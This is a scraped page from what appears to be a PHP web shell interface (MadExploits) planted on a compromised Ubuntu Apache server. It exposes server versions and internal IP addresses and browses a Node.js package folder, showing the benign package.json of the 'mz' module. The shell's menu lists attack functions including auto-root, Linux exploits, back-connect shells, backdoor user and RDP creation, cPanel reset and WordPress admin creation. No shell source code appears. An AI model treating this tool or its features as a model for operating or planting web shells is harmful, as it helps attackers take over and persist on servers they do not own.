Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
mz /
[ HOME SHELL ]
Name
Size
Permission
Action
HISTORY.md
1.11
KB
-rw-rw-r--
LICENSE
1.09
KB
-rw-rw-r--
README.md
2.83
KB
-rw-rw-r--
child_process.js
113
B
-rw-rw-r--
crypto.js
135
B
-rw-rw-r--
dns.js
240
B
-rw-rw-r--
fs.js
1.02
KB
-rw-rw-r--
index.js
206
B
-rw-rw-r--
package.json
1012
B
-rw-rw-r--
readline.js
1.64
KB
-rw-rw-r--
zlib.js
181
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "mz", "description": "modernize node.js to current ECMAScript standards", "version": "2.7.0", "author": { "name": "Jonathan Ong", "email": "me@jongleberry.com", "url": "http://jongleberry.com", "twitter": "https://twitter.com/jongleberry" }, "license": "MIT", "repository": "normalize/mz", "dependencies": { "any-promise": "^1.0.0", "object-assign": "^4.0.1", "thenify-all": "^1.0.0" }, "devDependencies": { "istanbul": "^0.4.0", "bluebird": "^3.0.0", "mocha": "^3.0.0" }, "scripts": { "test": "mocha --reporter spec", "test-cov": "istanbul cover node_modules/mocha/bin/_mocha -- --reporter dot", "test-travis": "istanbul cover node_modules/mocha/bin/_mocha --report lcovonly -- --reporter dot" }, "keywords": [ "promisify", "promise", "thenify", "then", "es6" ], "files": [ "index.js", "child_process.js", "crypto.js", "dns.js", "fs.js", "readline.js", "zlib.js" ] }
Close